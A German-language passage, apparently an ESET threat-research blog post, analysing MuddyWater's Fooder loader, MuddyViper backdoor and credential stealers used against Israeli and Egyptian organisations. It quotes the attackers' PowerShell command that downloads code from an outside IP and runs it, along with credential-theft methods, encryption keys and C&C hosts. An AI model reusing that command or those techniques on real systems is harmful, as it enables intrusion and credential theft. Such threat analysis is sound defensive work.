Falsche Schlangen: Neues von MuddyWater

ESET Forscher haben neue MuddyWater-Aktivitäten identifiziert, die hauptsächlich auf Organisationen in Israel abzielen, wobei ein Ziel in Ägypten bestätigt wurde. MuddyWater, auch bekannt als Mango Sandstorm oder TA450, ist eine mit dem Iran verbündete Cyberspionage-Gruppe, die für ihre hartnäckigen Angriffe auf Regierungen und kritische Infrastrukturen bekannt ist und dabei häufig maßgeschneiderte Malware und öffentlich verfügbare Tools einsetzt. In dieser Kampagne setzten die Angreifer eine Reihe von bisher nicht dokumentierten, benutzerdefinierten Tools ein, um die Umgehung der Verteidigung und die Persistenz zu verbessern. Zu diesen Tools gehört ein benutzerdefinierter Fooder-Lader, der zur Ausführung von MuddyViper, einer C/C++-Backdoor, entwickelt wurde. Mehrere Versionen von Fooder geben sich als das klassische Snake-Spiel aus, und seine interne Logik umfasst eine benutzerdefinierte Verzögerungsfunktion, die von der Spielmechanik inspiriert ist, sowie die häufige Verwendung von Sleep-API-Aufrufen. Diese Funktionen sollen die Ausführung verzögern und eine automatische Analyse erschweren. MuddyViper ermöglicht es den Angreifern, Systeminformationen zu sammeln, Dateien und Shell-Befehle auszuführen, Dateien zu übertragen und Windows-Anmeldeinformationen und Browserdaten zu exfiltrieren. Die Kampagne nutzt auch Credential Stealers (CE-Notes und LP-Notes) und Reverse-Tunneling-Tools (go-socks5), die seit langem zu den Favoriten der MuddyWater-Betreiber gehören.

Obwohl dies unser erster öffentlicher Blogpost über MuddyWater ist, verfolgen ESET Forscher die Gruppe schon seit mehreren Jahren und haben ihre Aktivitäten in mehreren ESET APT Activity Reports dokumentiert. Im Gegensatz zu früheren Kampagnen von MuddyWater, die oft verrauscht und leicht zu entdecken waren, zeigt die in diesem Blogpost behandelte Kampagne einen gezielteren, ausgefeilteren und raffinierteren Ansatz.

Die wichtigsten Punkte dieses Blogposts:

• Die Entwickler von MuddyWater verwendeten CNG, die kryptografische Windows-API der nächsten Generation, was für Gruppen, die mit dem Iran in Verbindung stehen, einzigartig und in der allgemeinen Bedrohungslandschaft eher untypisch ist.
• Die Gruppe nutzte auch fortschrittlichere Techniken, um MuddyViper, eine neue Backdoor, einzusetzen, indem sie einen Lader (Fooder) verwendete, der sie reflektiv in den Speicher lädt und ausführt.
• Wir stellen technische Analysen der in dieser Kampagne verwendeten Tools zur Verfügung, darunter MuddyViper, der Fooder-Loader, der CE-Notes-Browser-Datendiebstahl, der LP-Notes-Anmeldedaten-Diebstahl, der Blub-Browser-Datendiebstahl und go-socks5-Reverse-Tunnel.
• Während dieser Kampagne vermieden die Betreiber absichtlich interaktive Sitzungen mit der Tastatur, eine Technik, die in der Vergangenheit oft durch falsch eingegebene Befehle auffiel.

Überblick über die MuddyWater-Gruppe

MuddyWater ist eine Cyberspionagegruppe, die seit mindestens 2017 aktiv ist und hauptsächlich auf Einrichtungen im Nahen Osten und in Nordamerika abzielt. Sie ist eine der aktivsten, mit dem Iran verbundenen APT-Gruppen, die von ESET-Forschern aufgespürt wurden, und hat Verbindungen zum iranischen Ministerium für Nachrichtenwesen und nationale Sicherheit.

Die Gruppe wurde der Öffentlichkeit erstmals 2017 von Unit 42 als MuddyWater vorgestellt, deren Beschreibung der Aktivitäten der Gruppe mit den ESET-Profilen übereinstimmt - der Schwerpunkt liegt auf Cyberspionage, der Verwendung bösartiger Dokumente als Anhänge, die Benutzer zur Aktivierung von Makros und zur Umgehung von Sicherheitskontrollen veranlassen sollen, und der Ausrichtung auf Einrichtungen im Nahen Osten.

Zu den bemerkenswerten Aktivitäten in der Vergangenheit gehören die Operation Quicksand (2020), eine Cyberspionage-Kampagne, die auf israelische Regierungsstellen und Telekommunikationsunternehmen abzielte und die Entwicklung der Gruppe von einfachen Phishing-Taktiken hin zu fortschrittlicheren, mehrstufigen Operationen veranschaulicht, sowie eine Kampagne, die auf politische Gruppen und Organisationen in der Türkei abzielte und den geopolitischen Fokus der Gruppe, ihre Fähigkeit zur Anpassung von Social-Engineering-Taktiken an lokale Gegebenheiten und ihr Vertrauen in modulare Malware und eine flexible C&C-Infrastruktur verdeutlicht.

Neben ihrer häufigen Aktivität sind die Operationen von MuddyWater oft laut. Die Gruppe ist für ihre hartnäckigen Angriffe auf Behörden, Militär, Telekommunikation und kritische Infrastrukturen bekannt, wobei sie in der Regel benutzerdefinierte Malware und öffentlich verfügbare Tools einsetzt, um sich Zugang zu verschaffen, die Persistenz zu wahren und sensible Daten zu exfiltrieren. Die Gruppe hat es nicht nur auf ihren Erzfeind Israel abgesehen, sondern scheint auch Länder ins Visier zu nehmen, die diplomatische Beziehungen zum Iran unterhalten oder ausbauen wollen.

ESET hat mehrere Kampagnen dokumentiert, die MuddyWater zugeschrieben werden und die zeigen, dass sich das Toolset der Gruppe weiterentwickelt und der operative Schwerpunkt verlagert hat. Während sich die früheren Operationen auf ein breites Zielspektrum und relativ einfache Techniken stützten, zeigen die jüngsten Kampagnen Anzeichen für eine technische Verfeinerung und erhöhte Präzision.

Im März und April 2023 griff MuddyWater ein nicht identifiziertes Opfer in Saudi-Arabien an, indem es ein Batch-Skript bereitstellte, das eine PowerShell-basierte Backdoor herunterlud, die zum Herunterladen und Ausführen beliebiger Nutzdaten und anschließend zum Entfernen der ursprünglichen Nutzdaten von der Festplatte verwendet wurde.

Die Gruppe führte im Januar und Februar 2025 eine Kampagne durch, bei der es zu Überschneidungen mit Lyceum (einer Untergruppe von OilRig) kam, auf die in dieser Veröffentlichung näher eingegangen wird. Diese jüngste Überschneidung deutet auf eine Weiterentwicklung des Modus Operandi von MuddyWater hin.

Zu den öffentlich dokumentierten benutzerdefinierten Tools der Gruppe gehören beispielsweise die Backdoors Bugsleep, Blackout, Small Sieve, Mori und POWERSTATS sowie benutzerdefiniert kompilierte Varianten von Open-Source-Tools wie LaZagne oder CrackMapExec. Bei MuddyWater-Kampagnen werden in der Regel keine neuen Tools, Malware oder Techniken eingesetzt oder eingeführt; stattdessen sind sie oft aufgrund ihrer Zielrichtung bemerkenswert.

Während sich MuddyWater anfangs ausschließlich auf Cyberspionage konzentrierte, führte die Zusammenarbeit mit Lyceum zu einem Spearphishing-Angriff auf den Fertigungssektor. Der Angriff erregte viel Aufsehen und erreichte kaum operative Ziele.

Die in dieser Publikation beschriebene Kampagne zeigt, was für MuddyWater ein beispielloser Fortschritt in Bezug auf das Toolset und die technische Ausführung zu sein scheint.

Viktimologie

Wie bereits erwähnt, zielte MuddyWater bei dieser Kampagne in erster Linie auf Organisationen in Israel, aber auch auf eine in Ägypten. In Tabelle 1 sind die Opfer nach Ländern und vertikalen Regionen aufgeführt. Die Kampagne begann am^30. September 2024 und endete am^18. März 2025.

Tabelle 1: Opfer nach Land und Branche

Interessant an den Opfern in der Versorgungsbranche ist, dass sie am^11. Februar 2025 ebenfalls von Lyceum kompromittiert wurden.

Überschneidungen und Zusammenarbeit mit Lyceum

Anfang 2025 stellte ESET eine operative Überschneidung zwischen MuddyWater und Lyceum fest , einer Untergruppe der mit dem Iran verbündeten Cyberspionage-Gruppe OilRig, auch bekannt als HEXANE oder Storm-0133. OilRig ist seit mindestens 2014 aktiv und man geht davon aus, dass sie ihren Sitz im Iran hat. Zu den Tools, die wir Lyceum zuschreiben, gehören DanBot, Shark, Milan, Marlin, Solar, Mango, OilForceGTX und eine Reihe von Downloadern, die legitime Cloud-Dienste für die C&C-Kommunikation nutzen. Wir haben bereits beobachtet, dass Lyceum mehrere israelische Organisationen ins Visier genommen hat, darunter nationale und lokale Regierungsstellen sowie Organisationen im Gesundheitssektor.

Während der hier beschriebenen Kampagne führte MuddyWater im Januar und Februar 2025 eine gemeinsame Unterkampagne mit OilRig durch. MuddyWater initiierte den Zugriff über eine Spearphishing-E-Mail, die einen Link zu einem Installationsprogramm für die Syncro-Software zur Fernüberwachung und -verwaltung (RMM) enthielt. Nach der ersten Kompromittierung installierten die Angreifer ein zusätzliches RMM-Tool, PDQ, und setzten einen benutzerdefinierten Mimikatz-Loader ein, der als Zertifikatsdateien mit .txt-Dateierweiterung getarnt war. Ausgehend von den beobachteten Aktivitäten wurden die erbeuteten Anmeldedaten wahrscheinlich von Lyceum verwendet, um sich Zugang zu verschaffen und die Kontrolle über die Abläufe in dem anvisierten Unternehmen des Fertigungssektors in Israel zu übernehmen.

Diese Zusammenarbeit deutet darauf hin, dass MuddyWater möglicherweise als erster Zugangsvermittler für andere mit dem Iran verbündete Gruppen fungiert.

Zuschreibung

Die Viktimologie, die TTPs und die Werkzeuge, die bei dieser Kampagne beobachtet wurden, stimmen mit mehreren der neu dokumentierten Fähigkeiten und Werkzeuge überein, die wir zuvor MuddyWater zugeschrieben haben. Diese Einschätzung basiert auf der Methode des Erstzugriffs und der anschließenden Bereitstellung bösartiger Tools - im Allgemeinen über Spearphishing-E-Mails, die Links zum Herunterladen von RMM-Software enthalten.

TTPs

Die Betreiber von MuddyWater setzen weiterhin auf vorhersehbare und skriptbasierte Backdoors, die in PowerShell und Go geschrieben sind. Sie konzentrieren sich nach wie vor auf die Telekommunikations-, Regierungs-, Öl- und Energiebranche.

Der erste Zugriff erfolgt in der Regel über Spearphishing-E-Mails, die häufig PDF-Anhänge mit Links zu Installationsprogrammen für RMM-Software enthalten, die auf kostenlosen File-Sharing-Plattformen wie OneHub, Egnyte oder Mega gehostet werden. Diese Links führen zum Download von RMM-Tools wie Atera, Level, PDQ und SimpleHelp.

Zu den von den MuddyWater-Betreibern eingesetzten Tools gehört auch die VAX-One-Backdoor, die nach der legitimen Software benannt ist, als die sie sich ausgibt: Veeam, AnyDesk, Xerox und der OneDrive-Updater-Dienst.

Da die Gruppe weiterhin auf dieses vertraute Schema zurückgreift, sind ihre Aktivitäten relativ leicht zu erkennen und zu blockieren.

Tools überschneiden sich

Darüber hinaus haben wir Codeüberschneidungen zwischen mehreren der neu dokumentierten Tools und denen, die wir zuvor MuddyWater zugeschrieben haben, festgestellt:

• LP-Notes, ein neues Tool zum Stehlen von Anmeldeinformationen, hat das gleiche Design wie CE-Notes, ein Browser-Datendiebstahl-Tool, das wir zuvor mit MuddyWater in Verbindung brachten. Während dieser Kampagne haben wir auch einen Mimikatz-Loader beobachtet, der das gleiche Design und die gleichen Verschleierungsmethoden wie CE-Notes aufweist.
• Wir beobachteten mehrere neue Varianten der von MuddyWater angepassten Go-Socks5-Reverse-Tunnel, die die Gruppe in den Jahren 2024 und 2025 verwendete.
• In zwei Fällen beobachteten wir die angepassten go-socks5-Reverse-Tunnel, die in einen neuen MuddyWater-Loader mit dem internen Namen Fooder eingebettet waren. In einem Dutzend weiterer Fälle wurde dieser Lader zum Laden der neuen Backdoor von MuddyWater, MuddyViper, verwendet.
• Interessanterweise verwenden MuddyViper und die CE-Notes/LP-Notes/Mimikatz-Loader-Varianten die CNG-API für die Datenverschlüsselung und -entschlüsselung. Soweit wir wissen, ist dies eine Besonderheit der mit dem Iran verbündeten Gruppen. Ein weiteres gemeinsames Merkmal dieser Tools ist, dass sie versuchen, Benutzeranmeldeinformationen zu stehlen, indem sie einen gefälschten Windows-Sicherheitsdialog öffnen.

Werkzeuge

In diesem Blogpost dokumentieren wir bisher unbekannte, benutzerdefinierte Tools, die von MuddyWater verwendet werden:

• Fooder Loader - ein neu identifizierter Loader, der die MuddyViper-Backdoor in den Speicher lädt und ausführt. Beachten Sie, dass mehrere Versionen von Fooder sich als das klassische Snake-Spiel tarnen, daher die Bezeichnung MuddyViper. Ein weiteres bemerkenswertes Merkmal von Fooder ist die häufige Verwendung einer benutzerdefinierten Verzögerungsfunktion, die die Kernlogik des Snake-Spiels implementiert, kombiniert mit Sleep-API-Aufrufen. Diese Funktionen zielen darauf ab, die Ausführung zu verzögern, um bösartiges Verhalten vor automatischen Analysesystemen zu verbergen.
• MuddyViper-Backdoor - eine bisher nicht dokumentierte C/C++-Backdoor, die es Angreifern ermöglicht, Systeminformationen zu sammeln, Dateien herunter- und hochzuladen, Dateien und Shell-Befehle auszuführen sowie Windows-Anmeldeinformationen und Browserdaten zu stehlen.

Der Rest der in diesem Blogpost dokumentierten Tools umfasst:

• CE-Notes, ein Browser-Datendiebstahlprogramm,
• LP-Notes, ein Programm zum Stehlen von Anmeldedaten,
• Blub, ein Browser-Datendiebstahlprogramm, und
• mehrere go-socks5 Reverse-Tunnel.

Fooder-Lader

Fooder ist ein 64-Bit-C/C++-Lader, der die eingebettete Nutzlast entschlüsselt und dann reflektiv lädt (siehe Abbildung 1), wobei MuddyViper die am häufigsten beobachtete Nutzlast ist.

Fooder scheint der interne Name dieses Tools zu sein, basierend auf seinen PDB-Pfaden:

• C:\Benutzer\win\Desktop\Fooder\Debug\Launcher.pdb
• C:\Benutzer\pc\Desktop\main\My_Project\Fooder\x64\Debug\Launcher.pdb

Obwohl wir nur ein Beispiel davon erfasst haben, glauben wir, dass Fooder von einer einfachen, in C geschriebenen Launcher-Anwendung ausgeführt wird. Es gibt keine String-Verschleierung und keine ausführliche Protokollierung auf der Konsole, und der PDB-Pfad bleibt intakt:

C:\Benutzer\pc\Quelle\repos\ConsoleApplication7\x64\Release\ConsoleApplication7.pdb

Wir haben eine Instanz (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) der Komponente beobachtet, die Fooder startet. Der Launcher, der unter dem Namen %USERPROFILE%\Downloads\OsUpdater.exe bereitgestellt wird, erwartet eine Prozess-ID als Befehlszeilenargument. Nach der Ausführung versucht er, das Token des angegebenen Prozesses über die API DuplicateTokenEx zu duplizieren, und verwendet dann CreateProcessAsUserA, um Fooder auszuführen.

Nach der Ausführung entschlüsselt Fooder die eingebettete Nutzlast in den folgenden Schritten:

• Das Befehlszeilenargument(6) wird zu jedem Byte eines fest kodierten Schlüssels hinzugefügt, woraus sich der AES-Entschlüsselungsschlüssel ergibt, der allen Proben gemeinsam ist, 6969697820511281801712341067111416133321394945138510872296106446.
• Ein hartkodierter Wert(5) wird von jedem Byte der hartkodierten Nutzdaten subtrahiert.
• Schließlich wird die hartkodierte Nutzlast mit der WinCrypt-API und dem AES-Schlüssel entschlüsselt.

Fooder lädt die Nutzdaten dann mit Hilfe von Reflective-Techniken direkt in den Speicher, so dass sie ausgeführt werden können, ohne auf Standard-Systemaufrufe oder das Schreiben auf die Festplatte angewiesen zu sein.

Einmal gestartet, wurde Fooder nicht nur zur Verbreitung von MuddyViper, sondern auch von HackBrowserData verwendet, einem Open-Source-Dienstprogramm, das in der Lage ist, sensible Browserinformationen wie Anmeldedaten und Cookies zu entschlüsseln und zu exportieren. Fooder erleichtert auch den Einsatz von go-socks5-Varianten, bei denen es sich um Go-kompilierte Binärdateien handelt, die als Reverse-Tunnel fungieren und es Angreifern ermöglichen, Firewalls und Network Address Translation (NAT)-Mechanismen zu umgehen. Die MuddyWater-Gruppe hat go-socks5 bereits früher unabhängig von Fooder eingesetzt, was darauf hindeutet, dass sie weiterhin auf dieses Tool für die heimliche Netzwerkkommunikation und Datenexfiltration angewiesen ist.

Beachten Sie, dass sich mehrere Versionen von Fooder als das Spiel Snake tarnen - siehe die in Abbildung 2 hervorgehobenen Strings und Mutexe - die am häufigsten eingebettete Nutzlast.

Ein weiteres bemerkenswertes Merkmal von Fooder ist die häufige Verwendung einer benutzerdefinierten Verzögerungsfunktion (die die Kernlogik des Snake-Spiels implementiert, bei dem der Spieler das Ende einer wachsenden Linie, die oft als Schlange dargestellt wird, manövriert, um Hindernissen auszuweichen und Gegenstände einzusammeln) und der Sleep-API-Aufrufe. Die Ausführungsverzögerung wird durch die Nachahmung der schleifenbasierten Verzögerungsfunktion erreicht: wie im Snake-Spiel, wo jede Bewegung durch eine Schleife gesteuert wird, die eine kurze Zeitspanne wartet, bevor das Spiel aktualisiert wird. Die Schleife führt Ausführungsverzögerungen ein, die das Verhalten der Malware verlangsamen und ihr helfen, Tools zu umgehen, die auf schnelle bösartige Aktivitäten achten. Abbildung 3 zeigt die Verzögerungen und das Willkommensbanner des Snake-Spiels, das dem Benutzer zur Laufzeit angezeigt wird.

Fooder verfügt nicht über eine eingebaute Persistenzfunktion. Wenn die endgültige Nutzlast von Fooder jedoch die MuddyViper-Backdoor ist, kann die Backdoor über eine geplante Aufgabe oder den Startup-Ordner eine Persistenz für den Lader einrichten.

MuddyViper-Hintertür

MuddyViper, eine bisher nicht dokumentierte, in C und C++ geschriebene Backdoor, ermöglicht den verdeckten Zugriff und die Kontrolle über kompromittierte Systeme. Wir haben MuddyViper nur im Speicher beobachtet, der von Fooder geladen wird, was der Grund dafür sein könnte, dass es keine Verschleierung oder String-Verschlüsselung gibt. Wie für MuddyWater typisch, sendet MuddyViper während seiner Ausführung extrem ausführliche und häufige Statusmeldungen an seinen C&C-Server, wie zum Beispiel die folgende:

• [+] Persist: -------------------- Hallo, ich bin Live --------------------
• [+] Persist: -------------------- Hallo,Erstes Mal --------------------
• [-] Persist: Aufgabe erstellen fehlgeschlagen !!!!

Die Hintertür führt außerdem eine lange Liste mit mehr als 150 Prozessnamen und Details zu den jeweiligen Produkten, um detaillierte Berichte über die in der kompromittierten Umgebung entdeckten Sicherheitstools senden zu können, obwohl das Hinzufügen der Details leicht auf der Serverseite hätte implementiert werden können:

• [>] Prozess: aciseagent.exe ~~> (Cisco Umbrella Roaming Security) --> (Security DNS) gefunden!
• [>] Prozess: acnamagent.exe ~~> (Absolute Persistence) --> (Asset Management) gefunden!
• [>] Prozess: acnamlogonagent.exe ~~> (Absolute Persistenz) --> (Asset Management) gefunden!

Dieses Verhalten führt zu einem erheblichen Netzwerkverkehr.

MuddyViper verfügt über zwei Methoden zur Herstellung der Persistenz:

• Sein Installationsverzeichnis kann als Windows-Startordner konfiguriert werden, indem die folgenden Registrierungswerte auf %APPDATALOCAL%\Microsoft\Windows\PPBCompatCache\ManagerCache gesetzt werden

  hKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup.

  ○ HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup.

• Eine geplante Aufgabe namens ManageOnDriveUpdater kann MuddyViper bei jedem Systemstart von diesem Pfad aus starten.

MuddyViper unterstützt 20 Backdoor-Befehle - Details zu allen Befehlen finden Sie in Tabelle 2 - und ist insbesondere in der Lage, Reverse-Shells zu öffnen und zu bedienen, Dateien herunterzuladen, hochzuladen und auszuführen, die laufenden Sicherheitstools zu melden, Benutzeranmeldeinformationen und Daten aus einer Vielzahl von Browsern zu stehlen, seine eigene Persistenz einzurichten und sich selbst zu deinstallieren.

Tabelle 2. MuddyViper-Backdoor-Befehle

Einer der in Tabelle 2 aufgeführten Befehle mit der ID 805 zeigt einen gefälschten Windows-Sicherheitsdialog an, um das Opfer dazu zu verleiten, seine Windows-Anmeldedaten einzugeben (siehe Abbildung 4). Eine ähnliche Technik wird vom LP-Notes-Stealer von MuddyWater verwendet (siehe LP-Notes Credential Stealer).

Ein weiterer Befehl mit der ID 900 zielt darauf ab, MuddyViper von dem kompromittierten Computer zu entfernen und seine Persistenz zu löschen; der Befehl entfernt jedoch nicht alle Spuren der Backdoor.

Netzwerkprotokoll

Zur Kommunikation mit seinem C&C-Server verwendet MuddyViper HTTP-GET-Anfragen (über die WinHTTP-API) über Port 443, wobei das WINHTTP_FLAG_SECURE-Flag für die Verwendung von SSL/TLS konfiguriert ist. Es wurden zwei C&C-Server beobachtet: processplanet[.]org und 35.175.224[.]64.

In beiden Kommunikationsrichtungen werden die Daten mit AES-CBC verschlüsselt, wobei die CNG-API mit dem Schlüssel (der für alle Stichproben verwendet wird) 0608101047106453101617106423101013101012101083109710108585106969 und der IV 0 verwendet wird.

In der Backdoor → Server-Richtung der Kommunikation:

• Jeder vom C&C-Server unterstützte Endpunkt-URI kann von der Backdoor für eine bestimmte Art von Anfrage verwendet werden, z. B. für die Anforderung eines Befehls, das Hochladen einer Datei oder das Senden einer benutzerdefinierten Statusmeldung.
• Zusätzliche Daten für den C&C-Server sind im HTTP-Anfragekörper enthalten, was für HTTP-GET-Anfragen unüblich ist.
• Der User-Agent-String ist A WinHTTP Example Program/1.0, ein Überbleibsel des Beispielcodes für die WinHttpOpen-API.
• Die Timeouts für Verbindung, Senden, Empfangen und Antworten sind auf 30 Sekunden eingestellt.
• Die Standard-Schlafzeit zwischen aufeinanderfolgenden Verbindungsversuchen beträgt 60 Sekunden. Dieser Wert kann mit der Befehlskennung 700 konfiguriert werden.
• Bei einem Fehlschlag werden die Verbindungsversuche bis zu 10 Mal wiederholt.
• Vor der Verschlüsselung werden die Daten immer als <Computer_name>/<Benutzername>*<Daten> formatiert .

In der Richtung Server → Backdoor der Kommunikation:

• Der HTTP-Statuscode bestimmt die Backdoor-Befehlskennung.
• Die Argumente des Backdoor-Befehls werden in den HTTP-Antwortkörper aufgenommen.

CE-Notes Browser-Datendiebstahl

CE-Notes ist ein Browser-Datendiebstahlprogramm, das wir nach dem Dateinamen - ce-notes.txt - benannt haben, der verwendet wird, um gestohlene Daten auf der Festplatte zu speichern. Wir entdeckten CE-Notes im Jahr 2024, als wir beobachteten, dass MuddyWater EXE- und DLL-Versionen des Programms auf dem System einer Organisation in Israel installierte.

CE-Notes wurde mit dem folgenden PowerShell-Befehl heruntergeladen:

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression

Beide Versionen des Browser-Datenstehlers versuchen, den app-gebundenen Verschlüsselungsschlüssel zu stehlen und zu entschlüsseln, der in der Local State-Datei(%APPDATA%\Local\Google\Chrome\Benutzerdaten\Local State) von Chromium-Browsern (Chrome, Brave und Edge) gespeichert ist. Die App-gebundene Verschlüsselung wurde in Chrome Version 127 eingeführt, wodurch Chrome in der Lage ist, an die App-Identität gebundene Daten zu verschlüsseln. Cyberkriminelle und APT-Gruppen haben dies erkannt und versuchen aktiv, die app-gebundene Verschlüsselung zu umgehen, um Sitzungsschlüssel zu stehlen. CE-Notes ist ChromElevator auf GitHub sehr ähnlich.

Die gesammelten Daten sind AES-CBC-verschlüsselt, wobei die CNG-API mit dem Schlüssel 9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F und der IV 4103A09887B82FFD56A93BB431805224 verwendet wird.

Dann werden die verschlüsselten Daten auf der Festplatte in C:\Users\Public\Downloads\ce-notes.txt gespeichert, um später abgerufen zu werden (wahrscheinlich über ein RMM-Tool, da weder die EXE- noch die DLL-Versionen über Mittel zum Exfiltrieren der Datei verfügen). Der Hauptunterschied zwischen der EXE- und der DLL-Version ist die der DLL hinzugefügte Funktion zur Umgehung der virtuellen Maschine.

Wir haben den CE-Notes-Browser-Datendiebstahl an den folgenden Stellen beobachtet:

• C:\system2.dll
• C:\Benutzer\Öffentlichkeit\Downloads\system2.dll
• C:\Intel\system.dll
• C:\20240926_165509.exe

LP-Notes credential stealer

LP-Notes ist ein C/C++ Windows Credential Stealer mit dem gleichen Design wie der CE-Notes Browser-Data Stealer. In Anlehnung an die gleiche Namenskonvention wie bei CE-Notes haben wir den Stealer LP-Notes genannt, basierend auf der lokalen Datei, die er verwendet, um gestohlene Anmeldedaten vor der Exfiltration zu speichern: C:\Users\Public\Downloads\lp-notes.txt (im Gegensatz zu C:\Users\Public\Downloads\ce-notes.txt). Der einzige Zweck von LP-Notes besteht darin, Opfer zur Eingabe ihrer Anmeldedaten zu verleiten, indem ein gefälschter Windows-Sicherheitsdialog angezeigt wird, der sie zur Eingabe ihres Windows-Benutzernamens und -Kennworts auffordert. Wir haben beobachtet, dass LP-Notes heruntergeladen und von PowerShell mit einer Befehlszeile ausgeführt wurde, die der im Abschnitt CE-Notes gezeigten sehr ähnlich ist.

Initialisierung

Bei der Ausführung beginnt LP-Notes mit der Suche nach einem Prozess namens taskhostw.exe (Host-Prozess für Windows-Aufgaben) und gibt sich dann als der Sicherheitskontext des Prozesses aus (über die ImpersonateLoggedOnUser-API ); erst dann aktiviert LP-Notes seine schädliche Nutzlast.

LP-Notes verwendet mehrere einfache Verschleierungstechniken, darunter eine benutzerdefinierte, additionsbasierte Routine zur Entschlüsselung von Zeichenketten. Abbildung 5 zeigt die Funktion, die Zeichenketten mit einer Länge von 15 bis 19 Zeichen entschlüsselt, wobei der Entschlüsselungsschlüssel immer derselbe ist - eine Reihe von vordefinierten Konstanten, die zu jedem Byte der Zeichenkette addiert oder subtrahiert werden. Interessanterweise verwendet CE-Notes die gleiche Entschlüsselungsroutine, allerdings mit einem anderen Entschlüsselungsschlüssel, wie in Abbildung 6 dargestellt.

LP-Notes verwendet String-Stacking für Strings, die kürzer als 15 oder länger als 19 Zeichen sind, einschließlich Entschlüsselungsschlüssel, IV und Importnamen. Um die Verwendung von Windows-API-Funktionen zu verschleiern und die statische Analyse zu erschweren, löst LP-Notes die API-Funktionen während des Starts der C-Laufzeit dynamisch auf, bevor die WinMain-Funktion, der Standard-Einstiegspunkt für eine grafische Windows-Anwendung von Microsoft, ausgeführt wird, und verbirgt so direkte Verweise auf die API-Funktionen vor der Pseudocode-Ansicht (siehe Abbildung 7).

Fähigkeiten

In einer Endlosschleife zeigt LP-Notes ein gefälschtes Windows-Sicherheitsdialogfeld an, in dem das Opfer aufgefordert wird, seinen Windows-Benutzernamen und sein Kennwort einzugeben (siehe Abbildung 8, über die API CredUIPromptForWindowsCredentialsW ). Beachten Sie, dass dies zwar ähnlich, aber nicht identisch mit der von MuddyViper verwendeten gefälschten Eingabeaufforderung für Anmeldeinformationen ist (siehe Abbildung 4). Es bestätigt sofort die Gültigkeit der übermittelten Anmeldeinformationen, indem es versucht, sich als dieser Benutzer anzumelden (über die APIs CredUnPackAuthenticationBufferW und LogonUserW ).

Bei Erfolg werden die gesammelten Anmeldedaten dann mit der CNG-API mit dem Schlüssel ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC und der IV 91A4E6F6D51DAEE773A8F00279792578 verschlüsselt.

Ähnlich wie CE-Notes speichert LP-Notes die verschlüsselten Zugangsdaten in einer lokalen Datei - in diesem Fall C:\Users\Public\Downloads\lp-notes.txt. Da keine dieser Komponenten in der Lage ist, Daten zu exfiltrieren, übernimmt dies vermutlich eine andere Komponente (entweder ein RMM-Tool oder MuddyViper).

Blub browser-data stealer

Blub ist ein C/C++-Browser-Datendiebstahlprogramm, das eine statisch gelinkte SQLite-Bibliothek enthält. Der Name leitet sich von seinem Dateinamen, Blub.exe, ab. Wir haben den PDB-Pfad C:\Users\jojo\source\repos\stealer\x64\Release\stealer.pdb beobachtet. Er stiehlt Benutzeranmeldedaten von Google Chrome, Microsoft Edge, Mozilla Firefox und Opera Webbrowsern.

Chromium-basierte Browser

Bei Chrome beendet Blub zunächst chrome.exe (falls ausgeführt) und analysiert und entschlüsselt dann den Verschlüsselungsschlüssel aus C:\Benutzer\<Benutzername>\AppData\Local\Google\Chrome\Benutzerdaten\Local State. Dieser Schlüssel wird verwendet, um von Chrome gespeicherte sensible Daten wie Passwörter oder Cookies zu verschlüsseln, und er ist durch die Datenschutz-API (DPAPI) geschützt, so dass er nur auf dem System entschlüsselt werden kann, auf dem er ursprünglich verschlüsselt wurde. Blub entschlüsselt diesen Schlüssel über die CryptUnprotectData-API und verwendet ihn dann zur Entschlüsselung von Benutzeranmeldeinformationen, die von allen vorhandenen Chrome-Benutzerprofilen auf dem angegriffenen Computer stammen. Die Anmeldedaten, die in C:\Users\<Benutzername>\AppData\Local\Google\Chrome\User Data\<profile_name>\Login Data gespeichert sind, werden über die folgende SQL-Abfrage ermittelt:

SELECT origin_url, username_value, password_value FROM logins

Eine ähnliche Reihe von Schritten wird verwendet, um Benutzeranmeldeinformationen von Microsoft Edge- und Opera-Benutzerprofilen zu erhalten und zu entschlüsseln, wobei der Schlüssel aus C:\Benutzer\<Benutzername>\AppData\Local\Microsoft\Edge\Benutzerdaten\Local State und C:\Benutzer\<Benutzername>\AppData\Roaming\Opera Software\Opera Stable\Local State verwendet wird.

Firefox

Um schließlich die gespeicherten Benutzerdaten für Mozilla Firefox zu entschlüsseln, analysiert Blub den Hostnamen, den verschlüsselten Benutzernamen und das verschlüsselte Passwort aus der Datei logins.json im Profilverzeichnis des jeweiligen Benutzers, d. h. %APPDATAROAMING%\Mozilla\Firefox\Profiles\<profile_name>\. Die Anmeldedaten werden dann mit der Funktion PK11SDR_Decrypt aus der von Firefox verwendeten nss3.dll-Bibliothek entschlüsselt.

Die gesammelten Daten werden unverschlüsselt in einer lokalen Datei namens file.txt gespeichert. Die gleichen Daten werden unverschlüsselt auf der Konsole protokolliert, zusammen mit ausführlichen Statusmeldungen. Blub hat keine Möglichkeit, diese Datei zu exfiltrieren.

Beachten Sie, dass Blub nach laufenden Prozessen sucht, die mit Sicherheitslösungen verbunden sind, bevor er seine bösartige Nutzlast ausführt, wobei er sich auf die Kombination der Prozesse afwServ.exe (Avast Firewall) und AvastSvc.exe (Avast Antivirus) konzentriert. Wenn afwServ.exe als aktiv erkannt wird (aber nicht AvastSvc.exe), schließt Blub daraus, dass Norton (das jetzt die Avast-Engine verwendet) auf dem angegriffenen Host läuft, und beendet sich. Wenn AvastSvc.exe (Avast) erkannt wird, fährt Blub mit der Ausführung fort, überspringt aber den Diebstahl von Anmeldeinformationen von Microsoft Edge.

Während die Zeichenfolgen von Blub im Klartext gespeichert werden, wird für die Zeichenfolgen, die mit der Datenklau-Funktion von Google Chrome verbunden sind, eine einfache Verschleierungstechnik verwendet. Insbesondere werden mehrere Zeichenketten zu einer langen Zeichenkette mit 16 zufälligen Zeichen dazwischen verkettet, offenbar um sie bei der statischen Analyse zu verbergen:

